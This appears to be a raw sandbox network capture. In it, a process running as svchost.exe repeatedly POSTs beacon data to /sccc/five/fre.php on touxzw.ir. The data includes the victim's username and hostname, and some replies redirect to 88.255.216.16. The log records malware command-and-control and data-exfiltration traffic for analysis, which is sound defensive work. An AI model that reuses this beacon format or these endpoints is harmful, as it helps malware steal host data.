Feb 20, 2025 15:06:35.752793074 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GBIcEbbNt%2FB4WfJnYt8M32M3pDKN9jGYzm7PS26veyM9LFee6SL1rrtqXukx5g8sER%2BshCHYOHpk3idn43iJxmKAX3N6pYy5wFQK1hfJRbmgRA%2BhMFqybpiapDA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0edea8620f81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1698&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49730	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:37.012134075 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:37.017142057 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:37.735495090 CET	837	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CVEpDi3ySDzgpiJjfUfUAuWGYoXNgIfKKcnQNeJ0aadWM8v2zJhcqqGqz6mmRGcfdWeFfW8yc6MnytrZ5zTb8ydF3n8Ahk2vXqpS8659zTPi7ZOFYgJwOfDvSk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0eeb7dc78c41-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=2063&rtt_var=1031&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49747	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:38.910187960 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:38.915988922 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:39.690026045 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:06:39 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ybavS9skEgUbZ22u%2FhVElY5nyS1Bv5PLdbTQz7808E4YQkzyGkDebqcZGxhz4iiUhr16LGA9LA%2BR70Bnrusq6%2B1NsQFHydxXt8UIArLGuHztqmsFdXYbZM9DrS4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0ef7dc1f7283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1966&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49758	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:40.843333006 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:40.848385096 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:41.667829037 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pfpiWEV7NKyajtQER9%2FHBiBnE7eLpp%2F6TDfSKyIIzt5zdiLbCM%2Fcf%2Fdnigx4ULRLyGGs7FP12VB5gDXLGQdvTW9IoedrJc4KbrmXZKjiO9haT4RH6EpwQAs2Z9s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f03dd1e433f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49774	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:43.033180952 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:43.038217068 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:43.754199982 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:06:43 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LdExrhKauBceAd28Gtu90lpjkPN8gDYUri%2Bh0ocO%2BOEQuRrfvemqdUoNYTffvl6bIW4%2B5JpLPCR%2B2LnBBkYHkaM4t93R5uTh2fYmOpMmOf8hzEWMJOvj0bRD8do%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f1178b45e82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1650&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49789	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:44.917458057 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:44.922528982 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:45.774863005 CET	847	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=795P0CMe3kqwwcE2clhtjlQ%2B3in3Fpm0zRQHha4XK200OnyBeoLl7wuWsadkUgn6Pn8iS5NHCqByJbON%2BIXzx0r8lZ0IAKSJhMeVq2%2FYB5%2BhhszPuunzxE%2FTpIc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f1d48888c8d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2010&rtt_var=1005&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49806	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:47.027575970 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:47.032685041 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:47.888678074 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8%2Bb%2BLwTYsKWWTPwAOL28VzOLP9J9hlODnANciXnnWITHO3PKkTREImmGpjZ5dbKCUmLHlK36GDcagZ1C4Xgd7CKbZT%2FMxywsfb0zNU8qxjQzrmXDN7F2b95CCE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f2a9a90c32b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1526&rtt_var=763&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49820	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:49.047439098 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:49.052568913 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:49.874043941 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugdhnuYEA0nBK5TEslpYeskMiWjPpsqqvysRHLhhivGQ%2BAVTxCIM%2BhyYAazpjmIj5yp%2F0AZ8NpSMi3dBRhbu76R%2FPHr3lVt%2BL6qAhNlM2CIYMpuktDbKf9krWQE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f373f58437a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49834	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:51.045958996 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:51.051090002 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:51.783653021 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:06:51 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9u29HNu6qU4DC6fWv0nC2JOnmdOTFAZDhjpkJOn9gKAMwlJ1XTErUfGIqnsWVB2KmxlHAy644o8NRO1kCmz4A0ocr73NL5HtNjL3Sn3rfJiKWXyxVH%2BwUJftRHo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f439e3ac33f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1499&rtt_var=749&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49847	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:52.941293001 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:52.946795940 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:53.857409000 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E30BdQqhHElXuVCTWVw%2BXR9%2BCym0ZG8foPxfFeZ3DXyx7rLTcPCjYi3CIWl70MX9VIP4XNZykDzRIY%2Fr2pUKGQuVbxrFT%2Bl4Q0obXCzwFvJST8LZqIYFwyhXap8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f4f8e5a5e65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49859	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:55.016930103 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:55.022125006 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:55.803777933 CET	838	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uUtTuRRB6WdkOFVyZO3ZAmyJGraxGDfUE7BGQ0WlKNxnJKYdWm4OznXZGX5jRRkAbA9QTKFwBXRVI2pjoBr8%2BJr3YQm7Av2QGoHmgqQV3ZCTiILF0SXxrSKfVFs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f5c8e0c333c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=2063&rtt_var=1031&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49872	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:57.231378078 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:57.236547947 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:58.021136045 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGvHylktyVMPtj%2FsH6BqUPFZnrjj2LQxBl3wAWcK2zaFWmVzSCgy2ZPUJ%2FsFmmh%2BpCu9uqqaHuiSwkHvpUA9%2F9ZrYjKiQb4apWScFvjdSOiSTGaJnxZR2Q3msHY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f6a49b68cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1977&rtt_var=988&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49884	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:59.186620951 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:59.191948891 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:59.868896961 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqUu1pj52k7dm8lR0F4qx%2F8RhxZ5RvSc6tIiGQApUhO0YkrD5%2FK64M11E4dF6eE9IXMpQ%2Bg77t6BCPeUbiGAjFVc%2FcQY7Lv4Ra0glLXHyaIbKZ9FSXbaAagO9O8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f767d388c1b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1979&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49897	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:07:01.016081095 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:07:01.021173000 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:07:02.752197027 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:07:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UX5ckBIyURru%2BEU42u3yjJ0HERjcicuo4uU0NmpM0kXl%2F4O0fLHJF9ZtKqA%2FOJ%2BrmOIJgLPxdnR5gmq3nWuYYBuQs9y2F8cuhTYVO8phN1OQFVn5yCu5QAu6HDw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0f81e9184213-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2126&min_rtt=2126&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
